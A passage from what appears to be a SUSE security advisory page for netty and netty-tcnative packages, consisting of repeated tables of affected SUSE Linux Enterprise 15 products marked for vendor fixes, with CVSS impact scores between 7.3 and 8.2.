| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
8.2 (High)
Affected products
Recommended
35 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.3 (High)
Affected products
Recommended
35 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.3 (High)
Affected products
Recommended
35 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
35 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
35 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
